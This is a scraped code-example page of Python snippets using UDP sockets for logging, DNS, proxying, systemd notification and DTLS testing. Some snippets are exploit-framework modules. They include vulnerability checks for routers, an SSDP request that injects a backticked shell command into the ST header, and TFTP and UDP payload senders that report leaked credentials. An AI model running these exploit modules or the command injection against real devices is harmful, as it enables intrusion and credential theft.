def check(self):
buf = ("M-SEARCH * HTTP/1.1\r\n"
"Host:239.255.255.250:1900\r\n"
"ST:upnp:rootdevice\r\n"
"Man:\"ssdp:discover\"\r\n"
"MX:2\r\n\r\n")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
sock.connect((self.target, 1900))
sock.send(buf)
response = sock.recv(65535)
sock.close()
except Exception:
return False # target is not vulnerable
if "Linux, UPnP/1.0, DIR-" in response:
return True # target is vulnerable
return False # target is not vulnerable
python类SOCK_DGRAM的实例源码
def log_event(event_tuple):
try:
sec, usec, src_ip, dst_ip = event_tuple[0], event_tuple[1], event_tuple[2], event_tuple[4]
if not any(_ in WHITELIST for _ in (src_ip, dst_ip)):
localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)
event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))
if not config.DISABLE_LOCAL_LOG_STORAGE:
handle = get_event_log_handle(sec)
os.write(handle, event)
if config.LOG_SERVER:
remote_host, remote_port = config.LOG_SERVER.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto("%s %s" % (sec, event), (remote_host, int(remote_port)))
if config.DISABLE_LOCAL_LOG_STORAGE and not config.LOG_SERVER:
sys.stdout.write(event)
sys.stdout.flush()
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def __init__(self, port=17935, clients=[], broadcast=True):
util.Thread.__init__(self)
self.port = port
self.clients = clients
msg = '\x00'.join(["PyritServerAnnouncement",
'',
str(port)])
md = hashlib.sha1()
md.update(msg)
self.msg = msg + md.digest()
self.ucast_sckt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if broadcast:
self.bcast_sckt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.bcast_sckt.bind(('', 0))
self.bcast_sckt.setsockopt(socket.SOL_SOCKET, \
socket.SO_BROADCAST, 1)
else:
self.bcast_sckt = None
self.setDaemon(True)
self.start()
def _systemd_notify_once():
"""Send notification once to Systemd that service is ready.
Systemd sets NOTIFY_SOCKET environment variable with the name of the
socket listening for notifications from services.
This method removes the NOTIFY_SOCKET environment variable to ensure
notification is sent only once.
"""
notify_socket = os.getenv('NOTIFY_SOCKET')
if notify_socket:
if notify_socket.startswith('@'):
# abstract namespace socket
notify_socket = '\0%s' % notify_socket[1:]
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
with contextlib.closing(sock):
try:
sock.connect(notify_socket)
sock.sendall(b'READY=1')
del os.environ['NOTIFY_SOCKET']
except EnvironmentError:
LOG.debug("Systemd notification failed", exc_info=True)
def getIfConfig(ifname):
ifreq = {'ifname': ifname}
infos = {}
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# offsets defined in /usr/include/linux/sockios.h on linux 2.6
infos['addr'] = 0x8915 # SIOCGIFADDR
infos['brdaddr'] = 0x8919 # SIOCGIFBRDADDR
infos['hwaddr'] = 0x8927 # SIOCSIFHWADDR
infos['netmask'] = 0x891b # SIOCGIFNETMASK
try:
for k,v in infos.items():
ifreq[k] = _ifinfo(sock, v, ifname)
except:
pass
sock.close()
return ifreq
def client():
""" Procedimento responsável por enviar dados para o servidor e receber alguma resposta por conta disso """
text = input("Digite algum texto:\n") # Recebe dados
data = text.encode(ENCODE) # Codifica para BASE64 os dados de entrada
#Enviando de dados
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Inicializar um socket UDP
dest = (HOST, PORT) # Define IP de origem e Porta de destino
sock.sendto(data, dest) # Envia os dados para o destino
#Resposta de envio ao servidor
print(sock.getsockname()) # Imprime dados do socker de destino
data, address = sock.recvfrom(MAX_BYTES) # Recebendo dados
text = data.decode(ENCODE) # Convertendo dados de BASE64 para UTF-8
print(address, text) # Imprime texto e endereços
#Fechando Socket
sock.close()
def server():
#Abrindo um socket UDP na porta 5000
orig = (HOST, PORT)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(orig)
while True:
#recebi dados
data, address = sock.recvfrom(MAX_BYTES) # Recebi dados do socket
text = data.decode(ENCODE) # Convertendo dados de BASE64 para UTF-8
print(address, text)
#Envia resposta
text = "Total de dados recebidos: " + str(len(data))
data = text.encode(ENCODE) # Codifica para BASE64 os dados
sock.sendto(data, address) # Enviando dados
def __init__(self, address, callback, host, port, device_type=None,
backend='auto', interface=None):
self.address = address
self.callback = callback
self.device_type = device_type
self.interface = interface
self.HOST = host #'192.168.1.118'
self.PORT = port #9999
self.s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if backend == 'auto':
if platform == "linux" or platform == "linux2":
self.backend = 'gatt'
else:
self.backend = 'bgapi'
elif backend in ['gatt', 'bgapi']:
self.backend = backend
else:
raise(ValueError('Backend must be auto, gatt or bgapi'))
def handle_event(self, sock, fd, event):
if sock != self._sock:
return
if event & eventloop.POLL_ERR:
logging.error('dns socket err')
self._loop.remove(self._sock)
self._sock.close()
# TODO when dns server is IPv6
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
self._sock.setblocking(False)
self._loop.add(self._sock, eventloop.POLL_IN, self)
else:
data, addr = sock.recvfrom(1024)
if addr[0] not in self._servers:
logging.warn('received a packet other than our dns')
return
self._handle_data(data)
def check(self):
response = ""
payload = "\x00" * 8
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10.0)
try:
sock.sendto(payload, (self.target, 53413))
response = sock.recv(1024)
except Exception:
pass
if response.endswith("\xD0\xA5Login:"):
return True # target is vulnerable
elif response.endswith("\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x01\x00\x00"):
return True # target is vulnerable
return False # target is not vulnerable
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
print_status("Sending payload")
sock.sendto(self.payload, (self.target, 69))
try:
response = sock.recv(2048)
except Exception:
print_error("Exploit failed - device seems to be not vulnerable")
return
if len(response):
if "UseUserCredential" in response:
print_success("Exploit success - file {}".format("SPDefault.cnf.xml"))
print_info(response)
else:
print_error("Exploit failed - credentials not found in response")
else:
print_error("Exploit failed - empty response")
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
print_status("Sending exploit payload")
sock.sendto(self.payload, (self.target, 43690))
try:
print_status("Waiting for response")
response = sock.recv(1024)
except Exception:
print_error("Exploit failed - device seems to be not vulnerable")
return
if len(response):
print_success("Exploit success")
print_info(response)
def execute(self, cmd):
buf = ("M-SEARCH * HTTP/1.1\r\n"
"Host:239.255.255.250:1900\r\n"
"ST:uuid:`" + cmd + "`\r\n"
"Man:\"ssdp:discover\"\r\n"
"MX:2\r\n\r\n")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
sock.connect((self.target, 1900))
sock.send(buf)
sock.close()
except socket.error:
pass
return ""
def check(self):
buf = ("M-SEARCH * HTTP/1.1\r\n"
"Host:239.255.255.250:1900\r\n"
"ST:upnp:rootdevice\r\n"
"Man:\"ssdp:discover\"\r\n"
"MX:2\r\n\r\n")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
sock.connect((self.target, 1900))
sock.send(buf)
response = sock.recv(65535)
sock.close()
except Exception:
return False # target is not vulnerable
if "Linux, UPnP/1.0, DIR-" in response:
return True # target is vulnerable
return False # target is not vulnerable
LuckyThirteen_vulnerability_tester_plugin.py 文件源码
项目:midip-sslyze
作者: soukupa5
项目源码
文件源码
阅读 31
收藏 0
点赞 0
评论 0
def _test_dtls_ciphersuite(self, server_connectivity_info, dtls_version, cipher, port):
"""This function is used by threads to it investigates with support the cipher suite on server, when DTLS protocol(s) is/are tested. Returns instance of class AcceptCipher or RejectCipher.
Args:
server_connectivity_info (ServerConnectivityInfo): contains information for connection on server
dtls_version (str): contains SSL/TLS protocol version, which is used to connect
cipher (str): contains OpenSSL shortcut for identification cipher suite
port (int): contains port number for connecting comunication.
"""
cnx = SSL.Context(dtls_version)
cnx.set_cipher_list(cipher)
conn = SSL.Connection(cnx, socket.socket(socket.AF_INET, socket.SOCK_DGRAM))
try:
conn.connect((server_connectivity_info.ip_address, port))
conn.do_handshake()
except SSL.Error as e:
error_msg = ((e[0])[0])[2]
cipher_result = RejectCipher(TLS_OPENSSL_TO_RFC_NAMES_MAPPING[cipher], error_msg)
else:
cipher_result = AcceptCipher(TLS_OPENSSL_TO_RFC_NAMES_MAPPING[cipher])
finally:
conn.shutdown()
conn.close()
return cipher_result
LuckyThirteen_vulnerability_tester_plugin.py 文件源码
项目:midip-sslyze
作者: soukupa5
项目源码
文件源码
阅读 31
收藏 0
点赞 0
评论 0
def test_dtls_protocol_support(self, server_connectivity_info, dtls_version, port):
"""Tests if DTLS protocols are supported by server. Returns true if server supports protocol otherwise returns false.
Args:
server_connectivity_info (ServerConnectivityInfo): contains information for connection on server
dtls_protocol (str): contains version of DTLS protocol, which is supposed to be tested
port (int): contains port number for connecting comunication.
"""
cnx = SSL.Context(dtls_version)
cnx.set_cipher_list('ALL:COMPLEMENTOFALL')
conn = SSL.Connection(cnx,socket.socket(socket.AF_INET, socket.SOCK_DGRAM))
try:
conn.connect((server_connectivity_info.ip_address, port))
conn.do_handshake()
except SSL.SysCallError as ex:
if ex[0] == 111:
raise ValueError('LuckyThirteenVulnerabilityTesterPlugin: It is entered wrong port for DTLS connection.')
else:
support = False
else:
support = True
finally:
conn.shutdown()
conn.close()
return support
def test_sock_connect_address(self):
# In debug mode, sock_connect() must ensure that the address is already
# resolved (call _check_resolved_address())
self.loop.set_debug(True)
addresses = [(socket.AF_INET, ('www.python.org', 80))]
if support.IPV6_ENABLED:
addresses.extend((
(socket.AF_INET6, ('www.python.org', 80)),
(socket.AF_INET6, ('www.python.org', 80, 0, 0)),
))
for family, address in addresses:
for sock_type in (socket.SOCK_STREAM, socket.SOCK_DGRAM):
sock = socket.socket(family, sock_type)
with sock:
sock.setblocking(False)
connect = self.loop.sock_connect(sock, address)
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(connect)
self.assertIn('address must be resolved',
str(cm.exception))
def sendto(self, bytes, *args, **kwargs):
if self.type != socket.SOCK_DGRAM:
return _BaseSocket.sendto(self, bytes, *args, **kwargs)
if not self._proxyconn:
self.bind(("", 0))
address = args[-1]
flags = args[:-1]
header = BytesIO()
RSV = b"\x00\x00"
header.write(RSV)
STANDALONE = b"\x00"
header.write(STANDALONE)
self._write_SOCKS5_address(address, header)
sent = _BaseSocket.send(self, header.getvalue() + bytes, *flags, **kwargs)
return sent - header.tell()
def handle_event(self, sock, fd, event):
if sock != self._sock:
return
if event & eventloop.POLL_ERR:
logging.error('dns socket err')
self._loop.remove(self._sock)
self._sock.close()
# TODO when dns server is IPv6
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
self._sock.setblocking(False)
self._loop.add(self._sock, eventloop.POLL_IN, self)
else:
data, addr = sock.recvfrom(1024)
if addr[0] not in self._servers:
logging.warn('received a packet other than our dns')
return
self._handle_data(data)
def get_local_ip():
"""Try to determine the local IP address of the machine."""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Use Google Public DNS server to determine own IP
sock.connect(('8.8.8.8', 80))
return sock.getsockname()[0]
except socket.error:
return socket.gethostbyname(socket.gethostname())
finally:
sock.close()
# Taken from http://stackoverflow.com/a/23728630